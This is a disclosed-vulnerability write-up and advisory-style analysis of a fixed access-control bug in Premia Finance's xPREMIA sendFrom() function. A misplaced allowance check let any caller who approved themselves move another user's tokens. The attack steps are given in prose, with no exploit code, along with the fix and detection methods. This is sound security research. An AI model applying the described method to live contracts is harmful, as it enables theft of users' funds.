Full Report
The author commonly browses through DeFiLlama looking for new things to audit. If it has a TVL of 5M and has a bug bounty program, they will take a quick look for some low hanging fruit. The low hanging fruit are the focus of the article. In DeFi, it's common for the code of a popular project to be forked over and over again with small changes, such as Aave and Uniswap. Once you know how these codebases work, non-standard functions or modifications to the underlying protocol become great targets. The function sendFrom() appeared to be custom. This was used for allowing a user to transfer funds on behalf of another user. Essentially, it was a transferFrom() for cross-chain calls. The function took in a from address. However, this was NOT used for the verification; only the use. Instead, the allowance check was performed on the sender for the mapping twice! allowances[msg.sender][msg.sender] ended up being performed, after removing from abstraction. So, by allowing yourself, you can steal tokens from another user. Yikes! The bug is obvious; but the efficientcy of it is interesting. If you already know and have audited the top 10 most common codebases, then you can make quick work on a fork. Overall, a simple bug that led to a large payout.
Analysis Summary
# Vulnerability: Staked Premia (xPREMIA) Improper Access Control in Cross-Chain Transfer
## CVE Details
- **CVE ID**: Not Assigned (DeFi/Smart Contract vulnerability)
- **CVSS Score**: 9.1 (Critical)
- **CWE**: CWE-285: Improper Authorization (Broken Access Control)
## Affected Systems
- **Products**: Premia Finance (DeFi Options Protocol)
- **Versions**: xPREMIA (Staked Premia Token) contract prior to July 31, 2023.
- **Configurations**: The vulnerability specifically resided in the `sendFrom()` function, an implementation of the Omnichain Fungible Token (OFT) standard used for cross-chain calls.
## Vulnerability Description
The vulnerability was a critical logic error in the `_debitFrom()` internal function, which was called by the public `sendFrom()` function. In standard `transferFrom` logic, a caller (`msg.sender`) must have an allowance granted by the owner (`from`).
However, the vulnerable code implemented the allowance check incorrectly:
1. It used `msg.sender` as the key for the allowance mapping twice: `allowances[msg.sender][msg.sender]`.
2. This meant the contract checked if the caller had authorized **themselves** to spend their own tokens, rather than checking if the **owner** (`from`) had authorized the caller.
3. By calling `approve(msg.sender, amount)` on their own account, an attacker could satisfy the allowance check and then specify *any* third-party address as the `from` parameter to burn/transfer their tokens.
## Exploitation
- **Status**: PoC available (Independently discovered by Zellic; reported via bug bounty).
- **Complexity**: Low
- **Attack Vector**: Network (On-chain)
## Impact
- **Confidentiality**: Low
- **Integrity**: Critical (Unauthorized transfer/theft of tokens)
- **Availability**: High (Drainage of user staked balances)
- **Financial Impact**: Approximately $3,000,000 in TVL was at risk at the time of discovery.
## Remediation
### Patches
- The Premia Finance team addressed the bug on **July 31, 2023**, by updating the `_debitFrom` logic to correctly reference the `from` address in the allowance mapping: `allowances[from][spender]`.
### Workarounds
- There are no viable workarounds for the vulnerable contract; users were protected by the protocol-level patch and redeployment.
## Detection
- **Indicators of Compromise**: Unexpected `Transfer` or `Burn` events for xPREMIA tokens where the `from` address did not initiate the transaction and had not explicitly granted an allowance to the initiator.
- **Detection Methods**: Static analysis of forked protocols specifically targeting modifications to `OFT` or `OFTV2` standards. Automated tools like Slither can detect "Unused parameters" (the `from` parameter was ignored in the vulnerable mapping check).
## References
- **Zellic Research Advisory**: hxxps://www.zellic.io/blog/browsing-for-bugs-3m-bug-in-premia-finance/
- **Premia Finance**: hxxps://premia.finance/
- **LayerZero OFT Standard**: hxxps://github.com/LayerZero-Labs/solidity-examples/tree/main/contracts/token/oft